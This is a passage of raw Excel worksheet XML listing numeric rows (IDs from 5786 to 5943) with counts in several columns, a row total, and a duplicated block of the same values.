        <v>2</v>
      </c>
      <c r="Q1561" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1562" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1562" s="7">
        <v>5786</v>
      </c>
      <c r="B1562" s="8">
        <v>16</v>
      </c>
      <c r="C1562" s="8">
        <v>1</v>
      </c>
      <c r="D1562" s="8">
        <v>3</v>
      </c>
      <c r="E1562" s="8">
        <v>0</v>
      </c>
      <c r="F1562" s="8">
        <v>0</v>
      </c>
      <c r="G1562" s="8">
        <v>0</v>
      </c>
      <c r="H1562" s="8">
        <v>20</v>
      </c>
      <c r="K1562" s="7">
        <v>5786</v>
      </c>
      <c r="L1562" s="8">
        <v>16</v>
      </c>
      <c r="M1562" s="8">
        <v>1</v>
      </c>
      <c r="N1562" s="8">
        <v>3</v>
      </c>
      <c r="O1562" s="8">
        <v>0</v>
      </c>
      <c r="P1562" s="8">
        <v>0</v>
      </c>
      <c r="Q1562" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1563" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1563" s="7">
        <v>5789</v>
      </c>
      <c r="B1563" s="8">
        <v>26</v>
      </c>
      <c r="C1563" s="8">
        <v>0</v>
      </c>
      <c r="D1563" s="8">
        <v>6</v>
      </c>
      <c r="E1563" s="8">
        <v>9</v>
      </c>
      <c r="F1563" s="8">
        <v>6</v>
      </c>
      <c r="G1563" s="8">
        <v>10</v>
      </c>
      <c r="H1563" s="8">
        <v>57</v>
      </c>
      <c r="K1563" s="7">
        <v>5789</v>
      </c>
      <c r="L1563" s="8">
        <v>26</v>
      </c>
      <c r="M1563" s="8">
        <v>0</v>
      </c>
      <c r="N1563" s="8">
        <v>6</v>
      </c>
      <c r="O1563" s="8">
        <v>9</v>
      </c>
      <c r="P1563" s="8">
        <v>6</v>
      </c>
      <c r="Q1563" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1564" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1564" s="7">
        <v>5790</v>
      </c>
      <c r="B1564" s="8">
        <v>20</v>
      </c>
      <c r="C1564" s="8">
        <v>0</v>
      </c>
      <c r="D1564" s="8">
        <v>3</v>
      </c>
      <c r="E1564" s="8">
        <v>0</v>
      </c>
      <c r="F1564" s="8">
        <v>6</v>
      </c>
      <c r="G1564" s="8">
        <v>3</v>
      </c>
      <c r="H1564" s="8">
        <v>32</v>
      </c>
      <c r="K1564" s="7">
        <v>5790</v>
      </c>
      <c r="L1564" s="8">
        <v>20</v>
      </c>
      <c r="M1564" s="8">
        <v>0</v>
      </c>
      <c r="N1564" s="8">
        <v>3</v>
      </c>
      <c r="O1564" s="8">
        <v>0</v>
      </c>
      <c r="P1564" s="8">
        <v>6</v>
      </c>
      <c r="Q1564" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1565" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1565" s="7">
        <v>5791</v>
      </c>
      <c r="B1565" s="8">
        <v>12</v>
      </c>
      <c r="C1565" s="8">
        <v>1</v>
      </c>
      <c r="D1565" s="8">
        <v>2</v>
      </c>
      <c r="E1565" s="8">
        <v>1</v>
      </c>
      <c r="F1565" s="8">
        <v>0</v>
      </c>
      <c r="G1565" s="8">
        <v>2</v>
      </c>
      <c r="H1565" s="8">
        <v>18</v>
      </c>
      <c r="K1565" s="7">
        <v>5791</v>
      </c>
      <c r="L1565" s="8">
        <v>12</v>
      </c>
      <c r="M1565" s="8">
        <v>1</v>
      </c>
      <c r="N1565" s="8">
        <v>2</v>
      </c>
      <c r="O1565" s="8">
        <v>1</v>
      </c>
      <c r="P1565" s="8">
        <v>0</v>
      </c>
      <c r="Q1565" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1566" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1566" s="7">
        <v>5792</v>
      </c>
      <c r="B1566" s="8">
        <v>2</v>
      </c>
      <c r="C1566" s="8">
        <v>1</v>
      </c>
      <c r="D1566" s="8">
        <v>1</v>
      </c>
      <c r="E1566" s="8">
        <v>2</v>
      </c>
      <c r="F1566" s="8">
        <v>0</v>
      </c>
      <c r="G1566" s="8">
        <v>0</v>
      </c>
      <c r="H1566" s="8">
        <v>6</v>
      </c>
      <c r="K1566" s="7">
        <v>5792</v>
      </c>
      <c r="L1566" s="8">
        <v>2</v>
      </c>
      <c r="M1566" s="8">
        <v>1</v>
      </c>
      <c r="N1566" s="8">
        <v>1</v>
      </c>
      <c r="O1566" s="8">
        <v>2</v>
      </c>
      <c r="P1566" s="8">
        <v>0</v>
      </c>
      <c r="Q1566" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1567" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1567" s="7">
        <v>5794</v>
      </c>
      <c r="B1567" s="8">
        <v>10</v>
      </c>
      <c r="C1567" s="8">
        <v>1</v>
      </c>
      <c r="D1567" s="8">
        <v>0</v>
      </c>
      <c r="E1567" s="8">
        <v>2</v>
      </c>
      <c r="F1567" s="8">
        <v>0</v>
      </c>
      <c r="G1567" s="8">
        <v>0</v>
      </c>
      <c r="H1567" s="8">
        <v>13</v>
      </c>
      <c r="K1567" s="7">
        <v>5794</v>
      </c>
      <c r="L1567" s="8">
        <v>10</v>
      </c>
      <c r="M1567" s="8">
        <v>1</v>
      </c>
      <c r="N1567" s="8">
        <v>0</v>
      </c>
      <c r="O1567" s="8">
        <v>2</v>
      </c>
      <c r="P1567" s="8">
        <v>0</v>
      </c>
      <c r="Q1567" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1568" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1568" s="7">
        <v>5795</v>
      </c>
      <c r="B1568" s="8">
        <v>20</v>
      </c>
      <c r="C1568" s="8">
        <v>1</v>
      </c>
      <c r="D1568" s="8">
        <v>0</v>
      </c>
      <c r="E1568" s="8">
        <v>4</v>
      </c>
      <c r="F1568" s="8">
        <v>2</v>
      </c>
      <c r="G1568" s="8">
        <v>1</v>
      </c>
      <c r="H1568" s="8">
        <v>28</v>
      </c>
      <c r="K1568" s="7">
        <v>5795</v>
      </c>
      <c r="L1568" s="8">
        <v>20</v>
      </c>
      <c r="M1568" s="8">
        <v>1</v>
      </c>
      <c r="N1568" s="8">
        <v>0</v>
      </c>
      <c r="O1568" s="8">
        <v>4</v>
      </c>
      <c r="P1568" s="8">
        <v>2</v>
      </c>
      <c r="Q1568" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1569" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1569" s="7">
        <v>5796</v>
      </c>
      <c r="B1569" s="8">
        <v>20</v>
      </c>
      <c r="C1569" s="8">
        <v>2</v>
      </c>
      <c r="D1569" s="8">
        <v>1</v>
      </c>
      <c r="E1569" s="8">
        <v>1</v>
      </c>
      <c r="F1569" s="8">
        <v>10</v>
      </c>
      <c r="G1569" s="8">
        <v>3</v>
      </c>
      <c r="H1569" s="8">
        <v>37</v>
      </c>
      <c r="K1569" s="7">
        <v>5796</v>
      </c>
      <c r="L1569" s="8">
        <v>20</v>
      </c>
      <c r="M1569" s="8">
        <v>2</v>
      </c>
      <c r="N1569" s="8">
        <v>1</v>
      </c>
      <c r="O1569" s="8">
        <v>1</v>
      </c>
      <c r="P1569" s="8">
        <v>10</v>
      </c>
      <c r="Q1569" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1570" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1570" s="7">
        <v>5798</v>
      </c>
      <c r="B1570" s="8">
        <v>6</v>
      </c>
      <c r="C1570" s="8">
        <v>0</v>
      </c>
      <c r="D1570" s="8">
        <v>0</v>
      </c>
      <c r="E1570" s="8">
        <v>2</v>
      </c>
      <c r="F1570" s="8">
        <v>2</v>
      </c>
      <c r="G1570" s="8">
        <v>5</v>
      </c>
      <c r="H1570" s="8">
        <v>15</v>
      </c>
      <c r="K1570" s="7">
        <v>5798</v>
      </c>
      <c r="L1570" s="8">
        <v>6</v>
      </c>
      <c r="M1570" s="8">
        <v>0</v>
      </c>
      <c r="N1570" s="8">
        <v>0</v>
      </c>
      <c r="O1570" s="8">
        <v>2</v>
      </c>
      <c r="P1570" s="8">
        <v>2</v>
      </c>
      <c r="Q1570" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1571" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1571" s="7">
        <v>5799</v>
      </c>
      <c r="B1571" s="8">
        <v>50</v>
      </c>
      <c r="C1571" s="8">
        <v>0</v>
      </c>
      <c r="D1571" s="8">
        <v>5</v>
      </c>
      <c r="E1571" s="8">
        <v>0</v>
      </c>
      <c r="F1571" s="8">
        <v>2</v>
      </c>
      <c r="G1571" s="8">
        <v>1</v>
      </c>
      <c r="H1571" s="8">
        <v>58</v>
      </c>
      <c r="K1571" s="7">
        <v>5799</v>
      </c>
      <c r="L1571" s="8">
        <v>50</v>
      </c>
      <c r="M1571" s="8">
        <v>0</v>
      </c>
      <c r="N1571" s="8">
        <v>5</v>
      </c>
      <c r="O1571" s="8">
        <v>0</v>
      </c>
      <c r="P1571" s="8">
        <v>2</v>
      </c>
      <c r="Q1571" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1572" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1572" s="7">
        <v>5800</v>
      </c>
      <c r="B1572" s="8">
        <v>26</v>
      </c>
      <c r="C1572" s="8">
        <v>1</v>
      </c>
      <c r="D1572" s="8">
        <v>5</v>
      </c>
      <c r="E1572" s="8">
        <v>0</v>
      </c>
      <c r="F1572" s="8">
        <v>3</v>
      </c>
      <c r="G1572" s="8">
        <v>1</v>
      </c>
      <c r="H1572" s="8">
        <v>36</v>
      </c>
      <c r="K1572" s="7">
        <v>5800</v>
      </c>
      <c r="L1572" s="8">
        <v>26</v>
      </c>
      <c r="M1572" s="8">
        <v>1</v>
      </c>
      <c r="N1572" s="8">
        <v>5</v>
      </c>
      <c r="O1572" s="8">
        <v>0</v>
      </c>
      <c r="P1572" s="8">
        <v>3</v>
      </c>
      <c r="Q1572" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1573" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1573" s="7">
        <v>5801</v>
      </c>
      <c r="B1573" s="8">
        <v>24</v>
      </c>
      <c r="C1573" s="8">
        <v>1</v>
      </c>
      <c r="D1573" s="8">
        <v>0</v>
      </c>
      <c r="E1573" s="8">
        <v>0</v>
      </c>
      <c r="F1573" s="8">
        <v>3</v>
      </c>
      <c r="G1573" s="8">
        <v>2</v>
      </c>
      <c r="H1573" s="8">
        <v>30</v>
      </c>
      <c r="K1573" s="7">
        <v>5801</v>
      </c>
      <c r="L1573" s="8">
        <v>24</v>
      </c>
      <c r="M1573" s="8">
        <v>1</v>
      </c>
      <c r="N1573" s="8">
        <v>0</v>
      </c>
      <c r="O1573" s="8">
        <v>0</v>
      </c>
      <c r="P1573" s="8">
        <v>3</v>
      </c>
      <c r="Q1573" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1574" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1574" s="7">
        <v>5803</v>
      </c>
      <c r="B1574" s="8">
        <v>6</v>
      </c>
      <c r="C1574" s="8">
        <v>1</v>
      </c>
      <c r="D1574" s="8">
        <v>0</v>
      </c>
      <c r="E1574" s="8">
        <v>0</v>
      </c>
      <c r="F1574" s="8">
        <v>3</v>
      </c>
      <c r="G1574" s="8">
        <v>1</v>
      </c>
      <c r="H1574" s="8">
        <v>11</v>
      </c>
      <c r="K1574" s="7">
        <v>5803</v>
      </c>
      <c r="L1574" s="8">
        <v>6</v>
      </c>
      <c r="M1574" s="8">
        <v>1</v>
      </c>
      <c r="N1574" s="8">
        <v>0</v>
      </c>
      <c r="O1574" s="8">
        <v>0</v>
      </c>
      <c r="P1574" s="8">
        <v>3</v>
      </c>
      <c r="Q1574" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1575" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1575" s="7">
        <v>5804</v>
      </c>
      <c r="B1575" s="8">
        <v>0</v>
      </c>
      <c r="C1575" s="8">
        <v>0</v>
      </c>
      <c r="D1575" s="8">
        <v>0</v>
      </c>
      <c r="E1575" s="8">
        <v>0</v>
      </c>
      <c r="F1575" s="8">
        <v>2</v>
      </c>
      <c r="G1575" s="8">
        <v>2</v>
      </c>
      <c r="H1575" s="8">
        <v>4</v>
      </c>
      <c r="K1575" s="7">
        <v>5804</v>
      </c>
      <c r="L1575" s="8">
        <v>0</v>
      </c>
      <c r="M1575" s="8">
        <v>0</v>
      </c>
      <c r="N1575" s="8">
        <v>0</v>
      </c>
      <c r="O1575" s="8">
        <v>0</v>
      </c>
      <c r="P1575" s="8">
        <v>2</v>
      </c>
      <c r="Q1575" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1576" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1576" s="7">
        <v>5805</v>
      </c>
      <c r="B1576" s="8">
        <v>8</v>
      </c>
      <c r="C1576" s="8">
        <v>1</v>
      </c>
      <c r="D1576" s="8">
        <v>3</v>
      </c>
      <c r="E1576" s="8">
        <v>0</v>
      </c>
      <c r="F1576" s="8">
        <v>6</v>
      </c>
      <c r="G1576" s="8">
        <v>2</v>
      </c>
      <c r="H1576" s="8">
        <v>20</v>
      </c>
      <c r="K1576" s="7">
        <v>5805</v>
      </c>
      <c r="L1576" s="8">
        <v>8</v>
      </c>
      <c r="M1576" s="8">
        <v>1</v>
      </c>
      <c r="N1576" s="8">
        <v>3</v>
      </c>
      <c r="O1576" s="8">
        <v>0</v>
      </c>
      <c r="P1576" s="8">
        <v>6</v>
      </c>
      <c r="Q1576" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1577" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1577" s="7">
        <v>5806</v>
      </c>
      <c r="B1577" s="8">
        <v>0</v>
      </c>
      <c r="C1577" s="8">
        <v>0</v>
      </c>
      <c r="D1577" s="8">
        <v>0</v>
      </c>
      <c r="E1577" s="8">
        <v>0</v>
      </c>
      <c r="F1577" s="8">
        <v>6</v>
      </c>
      <c r="G1577" s="8">
        <v>20</v>
      </c>
      <c r="H1577" s="8">
        <v>26</v>
      </c>
      <c r="K1577" s="7">
        <v>5806</v>
      </c>
      <c r="L1577" s="8">
        <v>0</v>
      </c>
      <c r="M1577" s="8">
        <v>0</v>
      </c>
      <c r="N1577" s="8">
        <v>0</v>
      </c>
      <c r="O1577" s="8">
        <v>0</v>
      </c>
      <c r="P1577" s="8">
        <v>6</v>
      </c>
      <c r="Q1577" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="1578" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1578" s="7">
        <v>5810</v>
      </c>
      <c r="B1578" s="8">
        <v>28</v>
      </c>
      <c r="C1578" s="8">
        <v>0</v>
      </c>
      <c r="D1578" s="8">
        <v>4</v>
      </c>
      <c r="E1578" s="8">
        <v>1</v>
      </c>
      <c r="F1578" s="8">
        <v>3</v>
      </c>
      <c r="G1578" s="8">
        <v>2</v>
      </c>
      <c r="H1578" s="8">
        <v>38</v>
      </c>
      <c r="K1578" s="7">
        <v>5810</v>
      </c>
      <c r="L1578" s="8">
        <v>28</v>
      </c>
      <c r="M1578" s="8">
        <v>0</v>
      </c>
      <c r="N1578" s="8">
        <v>4</v>
      </c>
      <c r="O1578" s="8">
        <v>1</v>
      </c>
      <c r="P1578" s="8">
        <v>3</v>
      </c>
      <c r="Q1578" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1579" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1579" s="7">
        <v>5817</v>
      </c>
      <c r="B1579" s="8">
        <v>25</v>
      </c>
      <c r="C1579" s="8">
        <v>1</v>
      </c>
      <c r="D1579" s="8">
        <v>23</v>
      </c>
      <c r="E1579" s="8">
        <v>36</v>
      </c>
      <c r="F1579" s="8">
        <v>42</v>
      </c>
      <c r="G1579" s="8">
        <v>38</v>
      </c>
      <c r="H1579" s="8">
        <v>165</v>
      </c>
      <c r="K1579" s="7">
        <v>5817</v>
      </c>
      <c r="L1579" s="8">
        <v>25</v>
      </c>
      <c r="M1579" s="8">
        <v>1</v>
      </c>
      <c r="N1579" s="8">
        <v>23</v>
      </c>
      <c r="O1579" s="8">
        <v>36</v>
      </c>
      <c r="P1579" s="8">
        <v>42</v>
      </c>
      <c r="Q1579" s="8">
        <v>38</v>
      </c>
    </row>
    <row r="1580" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1580" s="7">
        <v>5818</v>
      </c>
      <c r="B1580" s="8">
        <v>24</v>
      </c>
      <c r="C1580" s="8">
        <v>0</v>
      </c>
      <c r="D1580" s="8">
        <v>0</v>
      </c>
      <c r="E1580" s="8">
        <v>0</v>
      </c>
      <c r="F1580" s="8">
        <v>2</v>
      </c>
      <c r="G1580" s="8">
        <v>3</v>
      </c>
      <c r="H1580" s="8">
        <v>29</v>
      </c>
      <c r="K1580" s="7">
        <v>5818</v>
      </c>
      <c r="L1580" s="8">
        <v>24</v>
      </c>
      <c r="M1580" s="8">
        <v>0</v>
      </c>
      <c r="N1580" s="8">
        <v>0</v>
      </c>
      <c r="O1580" s="8">
        <v>0</v>
      </c>
      <c r="P1580" s="8">
        <v>2</v>
      </c>
      <c r="Q1580" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1581" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1581" s="7">
        <v>5819</v>
      </c>
      <c r="B1581" s="8">
        <v>24</v>
      </c>
      <c r="C1581" s="8">
        <v>0</v>
      </c>
      <c r="D1581" s="8">
        <v>0</v>
      </c>
      <c r="E1581" s="8">
        <v>2</v>
      </c>
      <c r="F1581" s="8">
        <v>0</v>
      </c>
      <c r="G1581" s="8">
        <v>4</v>
      </c>
      <c r="H1581" s="8">
        <v>30</v>
      </c>
      <c r="K1581" s="7">
        <v>5819</v>
      </c>
      <c r="L1581" s="8">
        <v>24</v>
      </c>
      <c r="M1581" s="8">
        <v>0</v>
      </c>
      <c r="N1581" s="8">
        <v>0</v>
      </c>
      <c r="O1581" s="8">
        <v>2</v>
      </c>
      <c r="P1581" s="8">
        <v>0</v>
      </c>
      <c r="Q1581" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1582" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1582" s="7">
        <v>5820</v>
      </c>
      <c r="B1582" s="8">
        <v>6</v>
      </c>
      <c r="C1582" s="8">
        <v>2</v>
      </c>
      <c r="D1582" s="8">
        <v>9</v>
      </c>
      <c r="E1582" s="8">
        <v>9</v>
      </c>
      <c r="F1582" s="8">
        <v>9</v>
      </c>
      <c r="G1582" s="8">
        <v>8</v>
      </c>
      <c r="H1582" s="8">
        <v>43</v>
      </c>
      <c r="K1582" s="7">
        <v>5820</v>
      </c>
      <c r="L1582" s="8">
        <v>6</v>
      </c>
      <c r="M1582" s="8">
        <v>2</v>
      </c>
      <c r="N1582" s="8">
        <v>9</v>
      </c>
      <c r="O1582" s="8">
        <v>9</v>
      </c>
      <c r="P1582" s="8">
        <v>9</v>
      </c>
      <c r="Q1582" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1583" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1583" s="7">
        <v>5821</v>
      </c>
      <c r="B1583" s="8">
        <v>0</v>
      </c>
      <c r="C1583" s="8">
        <v>0</v>
      </c>
      <c r="D1583" s="8">
        <v>35</v>
      </c>
      <c r="E1583" s="8">
        <v>0</v>
      </c>
      <c r="F1583" s="8">
        <v>110</v>
      </c>
      <c r="G1583" s="8">
        <v>8</v>
      </c>
      <c r="H1583" s="8">
        <v>153</v>
      </c>
      <c r="K1583" s="7">
        <v>5821</v>
      </c>
      <c r="L1583" s="8">
        <v>0</v>
      </c>
      <c r="M1583" s="8">
        <v>0</v>
      </c>
      <c r="N1583" s="8">
        <v>35</v>
      </c>
      <c r="O1583" s="8">
        <v>0</v>
      </c>
      <c r="P1583" s="8">
        <v>110</v>
      </c>
      <c r="Q1583" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1584" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1584" s="7">
        <v>5828</v>
      </c>
      <c r="B1584" s="8">
        <v>50</v>
      </c>
      <c r="C1584" s="8">
        <v>1</v>
      </c>
      <c r="D1584" s="8">
        <v>0</v>
      </c>
      <c r="E1584" s="8">
        <v>0</v>
      </c>
      <c r="F1584" s="8">
        <v>2</v>
      </c>
      <c r="G1584" s="8">
        <v>13</v>
      </c>
      <c r="H1584" s="8">
        <v>66</v>
      </c>
      <c r="K1584" s="7">
        <v>5828</v>
      </c>
      <c r="L1584" s="8">
        <v>50</v>
      </c>
      <c r="M1584" s="8">
        <v>1</v>
      </c>
      <c r="N1584" s="8">
        <v>0</v>
      </c>
      <c r="O1584" s="8">
        <v>0</v>
      </c>
      <c r="P1584" s="8">
        <v>2</v>
      </c>
      <c r="Q1584" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="1585" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1585" s="7">
        <v>5922</v>
      </c>
      <c r="B1585" s="8">
        <v>26</v>
      </c>
      <c r="C1585" s="8">
        <v>1</v>
      </c>
      <c r="D1585" s="8">
        <v>4</v>
      </c>
      <c r="E1585" s="8">
        <v>5</v>
      </c>
      <c r="F1585" s="8">
        <v>2</v>
      </c>
      <c r="G1585" s="8">
        <v>1</v>
      </c>
      <c r="H1585" s="8">
        <v>39</v>
      </c>
      <c r="K1585" s="7">
        <v>5922</v>
      </c>
      <c r="L1585" s="8">
        <v>26</v>
      </c>
      <c r="M1585" s="8">
        <v>1</v>
      </c>
      <c r="N1585" s="8">
        <v>4</v>
      </c>
      <c r="O1585" s="8">
        <v>5</v>
      </c>
      <c r="P1585" s="8">
        <v>2</v>
      </c>
      <c r="Q1585" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1586" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1586" s="7">
        <v>5923</v>
      </c>
      <c r="B1586" s="8">
        <v>6</v>
      </c>
      <c r="C1586" s="8">
        <v>0</v>
      </c>
      <c r="D1586" s="8">
        <v>0</v>
      </c>
      <c r="E1586" s="8">
        <v>0</v>
      </c>
      <c r="F1586" s="8">
        <v>7</v>
      </c>
      <c r="G1586" s="8">
        <v>0</v>
      </c>
      <c r="H1586" s="8">
        <v>13</v>
      </c>
      <c r="K1586" s="7">
        <v>5923</v>
      </c>
      <c r="L1586" s="8">
        <v>6</v>
      </c>
      <c r="M1586" s="8">
        <v>0</v>
      </c>
      <c r="N1586" s="8">
        <v>0</v>
      </c>
      <c r="O1586" s="8">
        <v>0</v>
      </c>
      <c r="P1586" s="8">
        <v>7</v>
      </c>
      <c r="Q1586" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1587" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1587" s="7">
        <v>5928</v>
      </c>
      <c r="B1587" s="8">
        <v>22</v>
      </c>
      <c r="C1587" s="8">
        <v>0</v>
      </c>
      <c r="D1587" s="8">
        <v>5</v>
      </c>
      <c r="E1587" s="8">
        <v>0</v>
      </c>
      <c r="F1587" s="8">
        <v>1</v>
      </c>
      <c r="G1587" s="8">
        <v>4</v>
      </c>
      <c r="H1587" s="8">
        <v>32</v>
      </c>
      <c r="K1587" s="7">
        <v>5928</v>
      </c>
      <c r="L1587" s="8">
        <v>22</v>
      </c>
      <c r="M1587" s="8">
        <v>0</v>
      </c>
      <c r="N1587" s="8">
        <v>5</v>
      </c>
      <c r="O1587" s="8">
        <v>0</v>
      </c>
      <c r="P1587" s="8">
        <v>1</v>
      </c>
      <c r="Q1587" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1588" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1588" s="7">
        <v>5929</v>
      </c>
      <c r="B1588" s="8">
        <v>0</v>
      </c>
      <c r="C1588" s="8">
        <v>0</v>
      </c>
      <c r="D1588" s="8">
        <v>2</v>
      </c>
      <c r="E1588" s="8">
        <v>3</v>
      </c>
      <c r="F1588" s="8">
        <v>6</v>
      </c>
      <c r="G1588" s="8">
        <v>3</v>
      </c>
      <c r="H1588" s="8">
        <v>14</v>
      </c>
      <c r="K1588" s="7">
        <v>5929</v>
      </c>
      <c r="L1588" s="8">
        <v>0</v>
      </c>
      <c r="M1588" s="8">
        <v>0</v>
      </c>
      <c r="N1588" s="8">
        <v>2</v>
      </c>
      <c r="O1588" s="8">
        <v>3</v>
      </c>
      <c r="P1588" s="8">
        <v>6</v>
      </c>
      <c r="Q1588" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1589" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1589" s="7">
        <v>5930</v>
      </c>
      <c r="B1589" s="8">
        <v>25</v>
      </c>
      <c r="C1589" s="8">
        <v>3</v>
      </c>
      <c r="D1589" s="8">
        <v>5</v>
      </c>
      <c r="E1589" s="8">
        <v>0</v>
      </c>
      <c r="F1589" s="8">
        <v>7</v>
      </c>
      <c r="G1589" s="8">
        <v>2</v>
      </c>
      <c r="H1589" s="8">
        <v>42</v>
      </c>
      <c r="K1589" s="7">
        <v>5930</v>
      </c>
      <c r="L1589" s="8">
        <v>25</v>
      </c>
      <c r="M1589" s="8">
        <v>3</v>
      </c>
      <c r="N1589" s="8">
        <v>5</v>
      </c>
      <c r="O1589" s="8">
        <v>0</v>
      </c>
      <c r="P1589" s="8">
        <v>7</v>
      </c>
      <c r="Q1589" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1590" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1590" s="7">
        <v>5933</v>
      </c>
      <c r="B1590" s="8">
        <v>1</v>
      </c>
      <c r="C1590" s="8">
        <v>0</v>
      </c>
      <c r="D1590" s="8">
        <v>0</v>
      </c>
      <c r="E1590" s="8">
        <v>0</v>
      </c>
      <c r="F1590" s="8">
        <v>4</v>
      </c>
      <c r="G1590" s="8">
        <v>0</v>
      </c>
      <c r="H1590" s="8">
        <v>5</v>
      </c>
      <c r="K1590" s="7">
        <v>5933</v>
      </c>
      <c r="L1590" s="8">
        <v>1</v>
      </c>
      <c r="M1590" s="8">
        <v>0</v>
      </c>
      <c r="N1590" s="8">
        <v>0</v>
      </c>
      <c r="O1590" s="8">
        <v>0</v>
      </c>
      <c r="P1590" s="8">
        <v>4</v>
      </c>
      <c r="Q1590" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1591" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1591" s="7">
        <v>5938</v>
      </c>
      <c r="B1591" s="8">
        <v>24</v>
      </c>
      <c r="C1591" s="8">
        <v>1</v>
      </c>
      <c r="D1591" s="8">
        <v>0</v>
      </c>
      <c r="E1591" s="8">
        <v>0</v>
      </c>
      <c r="F1591" s="8">
        <v>11</v>
      </c>
      <c r="G1591" s="8">
        <v>7</v>
      </c>
      <c r="H1591" s="8">
        <v>43</v>
      </c>
      <c r="K1591" s="7">
        <v>5938</v>
      </c>
      <c r="L1591" s="8">
        <v>24</v>
      </c>
      <c r="M1591" s="8">
        <v>1</v>
      </c>
      <c r="N1591" s="8">
        <v>0</v>
      </c>
      <c r="O1591" s="8">
        <v>0</v>
      </c>
      <c r="P1591" s="8">
        <v>11</v>
      </c>
      <c r="Q1591" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1592" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1592" s="7">
        <v>5939</v>
      </c>
      <c r="B1592" s="8">
        <v>30</v>
      </c>
      <c r="C1592" s="8">
        <v>1</v>
      </c>
      <c r="D1592" s="8">
        <v>7</v>
      </c>
      <c r="E1592" s="8">
        <v>3</v>
      </c>
      <c r="F1592" s="8">
        <v>5</v>
      </c>
      <c r="G1592" s="8">
        <v>0</v>
      </c>
      <c r="H1592" s="8">
        <v>46</v>
      </c>
      <c r="K1592" s="7">
        <v>5939</v>
      </c>
      <c r="L1592" s="8">
        <v>30</v>
      </c>
      <c r="M1592" s="8">
        <v>1</v>
      </c>
      <c r="N1592" s="8">
        <v>7</v>
      </c>
      <c r="O1592" s="8">
        <v>3</v>
      </c>
      <c r="P1592" s="8">
        <v>5</v>
      </c>
      <c r="Q1592" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1593" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1593" s="7">
        <v>5942</v>
      </c>
      <c r="B1593" s="8">
        <v>26</v>
      </c>
      <c r="C1593" s="8">
        <v>0</v>
      </c>
      <c r="D1593" s="8">
        <v>0</v>
      </c>
      <c r="E1593" s="8">
        <v>0</v>
      </c>
      <c r="F1593" s="8">
        <v>1</v>
      </c>
      <c r="G1593" s="8">
        <v>3</v>
      </c>
      <c r="H1593" s="8">
        <v>30</v>
      </c>
      <c r="K1593" s="7">
        <v>5942</v>
      </c>
      <c r="L1593" s="8">
        <v>26</v>
      </c>
      <c r="M1593" s="8">
        <v>0</v>
      </c>
      <c r="N1593" s="8">
        <v>0</v>
      </c>
      <c r="O1593" s="8">
        <v>0</v>
      </c>
      <c r="P1593" s="8">
        <v>1</v>
      </c>
      <c r="Q1593" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1594" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1594" s="7">
        <v>5943</v>
      </c>
      <c r="B1594" s="8">
        <v>32</v>
      </c>
      <c r="C1594" s="8">
        <v>1</v>
      </c>
      <c r="D1594" s="8">
        <v>20</v>
      </c>
      <c r="E1594" s="8">
        <v>519</v>
      </c>
      <c r="F1594" s="8">
        <v>19</v>
      </c>
      <c r="G1594" s="8">
        <v>10</v>
      </c>
      <c r="H1594" s="8">
        <v>601</v>
      </c>
